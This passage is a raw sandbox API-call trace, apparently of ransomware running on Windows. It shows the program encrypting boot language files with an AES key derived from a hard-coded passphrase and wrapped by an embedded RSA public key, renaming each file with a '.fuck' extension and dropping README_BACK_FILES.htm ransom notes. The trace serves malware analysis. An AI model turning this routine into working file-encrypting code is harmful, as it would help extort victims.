dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a898) returned 1 [0231.511] CryptImportPublicKeyInfo (in: hCryptProv=0x276a898, dwCertEncodingType=0x1, pInfo=0x275f5b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275f5e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275f5e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394128) returned 1 [0231.511] CryptEncrypt (in: hKey=0x394128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.511] CryptEncrypt (in: hKey=0x394128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276a4e0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276a4e0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.511] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276a4e0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.511] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2778ae0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.511] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2778ae0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2778ae0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.511] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.511] CloseHandle (hObject=0xffffffff) returned 1 [0231.511] CloseHandle (hObject=0xffffffff) returned 1 [0231.511] CopyFileA (lpExistingFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.512] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.512] DeleteFileA (lpFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.gsg")) returned 0 [0231.512] MoveFileA (lpExistingFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\fr-FR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.fuck")) returned 0 [0231.512] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.513] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.513] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.513] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.513] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.513] FindClose (in: hFindFile=0x3949a8 | out: hFindFile=0x3949a8) returned 1 [0231.513] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-FR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fr-fr\\readme_back_files.htm")) returned 0x20 [0231.513] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.513] FindFirstFileA (in: lpFileName="C:\\\\Boot\\hr-HR\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x394a68 [0231.514] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.514] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.514] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.514] GetLastError () returned 0x12 [0231.514] GetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui")) returned 0x20 [0231.514] SetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.515] CreateFileA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.515] CreateFileA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.515] SetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.515] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.518] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.518] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.518] CryptHashData (hHash=0x3949a8, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.518] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x3949a8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394be8) returned 1 [0231.518] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.518] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.518] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276ade8) returned 1 [0231.518] CryptImportPublicKeyInfo (in: hCryptProv=0x276ade8, dwCertEncodingType=0x1, pInfo=0x275f820*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275f850*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275f858*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3942a8) returned 1 [0231.519] CryptEncrypt (in: hKey=0x3942a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.519] CryptEncrypt (in: hKey=0x3942a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b090*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b090*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.519] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b090, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.519] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2778ae0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.519] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2778ae0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2778ae0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.519] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2778ae0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.519] CloseHandle (hObject=0xffffffff) returned 1 [0231.519] CloseHandle (hObject=0xffffffff) returned 1 [0231.519] CopyFileA (lpExistingFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.519] SetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.520] DeleteFileA (lpFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.gsg")) returned 0 [0231.520] MoveFileA (lpExistingFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\hr-HR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.fuck")) returned 0 [0231.520] CryptDestroyHash (hHash=0x3949a8) returned 1 [0231.520] CryptDestroyKey (hKey=0x394be8) returned 1 [0231.520] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.520] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.520] FindNextFileA (in: hFindFile=0x394a68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.520] FindClose (in: hFindFile=0x394a68 | out: hFindFile=0x394a68) returned 1 [0231.521] GetFileAttributesA (lpFileName="C:\\\\Boot\\hr-HR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\hr-hr\\readme_back_files.htm")) returned 0x20 [0231.521] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.521] FindFirstFileA (in: lpFileName="C:\\\\Boot\\hu-HU\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x3949a8 [0231.522] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.523] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.523] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.523] GetLastError () returned 0x12 [0231.523] GetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0231.523] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.523] CreateFileA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.524] CreateFileA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.524] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.524] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.527] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.527] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.527] CryptHashData (hHash=0x394a68, pbData=0x2ecaf8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.527] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394be8) returned 1 [0231.527] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.527] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.527] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a788) returned 1 [0231.528] CryptImportPublicKeyInfo (in: hCryptProv=0x276a788, dwCertEncodingType=0x1, pInfo=0x275f9c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275f9f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275f9f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3941a8) returned 1 [0231.528] CryptEncrypt (in: hKey=0x3941a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.528] CryptEncrypt (in: hKey=0x3941a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276b118*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276b118*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.528] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276b118, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.528] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2716778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2716778, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.528] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2716778*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2716778*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.528] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2716778, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.528] CloseHandle (hObject=0xffffffff) returned 1 [0231.528] CloseHandle (hObject=0xffffffff) returned 1 [0231.528] CopyFileA (lpExistingFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.529] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.529] DeleteFileA (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.gsg")) returned 0 [0231.529] MoveFileA (lpExistingFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.fuck")) returned 0 [0231.529] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.529] CryptDestroyKey (hKey=0x394be8) returned 1 [0231.529] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.529] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.529] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.530] GetLastError () returned 0x5 [0231.530] GetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui")) returned 0x20 [0231.530] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.531] CreateFileA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.531] CreateFileA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.531] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.531] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.533] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.534] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.534] CryptHashData (hHash=0x394d28, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.534] CryptDeriveKey (in: hProv=0x276b5e0, Algid=0x6610, hBaseData=0x394d28, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394a68) returned 1 [0231.534] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.534] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.534] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x276a810) returned 1 [0231.534] CryptImportPublicKeyInfo (in: hCryptProv=0x276a810, dwCertEncodingType=0x1, pInfo=0x275fdd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x275fe00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x275fe08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716e28) returned 1 [0231.534] CryptEncrypt (in: hKey=0x2716e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.534] CryptEncrypt (in: hKey=0x2716e28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x276abc8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x276abc8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.535] WriteFile (in: hFile=0xffffffff, lpBuffer=0x276abc8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.535] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2717780, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.535] CryptEncrypt (in: hKey=0x394a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2717780*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.535] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2717780, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.535] CloseHandle (hObject=0xffffffff) returned 1 [0231.535] CloseHandle (hObject=0xffffffff) returned 1 [0231.535] CopyFileA (lpExistingFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.535] SetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.535] DeleteFileA (lpFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.gsg")) returned 0 [0231.536] MoveFileA (lpExistingFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\hu-HU\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.fuck")) returned 0 [0231.536] CryptDestroyHash (hHash=0x394d28) returned 1 [0231.536] CryptDestroyKey (hKey=0x394a68) returned 1 [0231.536] CryptReleaseContext (hProv=0x276b5e0, dwFlags=0x0) returned 1 [0231.536] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.536] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.536] FindClose (in: hFindFile=0x3949a8 | out: hFindFile=0x3949a8) returned 1 [0231.536] GetFileAttributesA (lpFileName="C:\\\\Boot\\hu-HU\\README_BACK_FILES.htm" (normalized: "c:\\boot\\hu-hu\\readme_back_files.htm")) returned 0x20 [0231.537] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.537] FindFirstFileA (in: lpFileName="C:\\\\Boot\\it-IT\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x27168e8 [0231.538] FindNextFileA (in: hFindFile=0x27168e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.538] FindNextFileA (in: hFindFile=0x27168e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.538] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.538] GetLastError () returned 0x12 [0231.538] GetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0231.539] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.539] CreateFileA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.539] CreateFileA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.539] SetFileAttributesA (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.540] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x276b5e0) returned 1 [0231.542] CryptCreateHash (in: hProv=0x276b5e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.542] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.543] CryptHashData (hHash=0x2716928, pbData=0x2ec828, 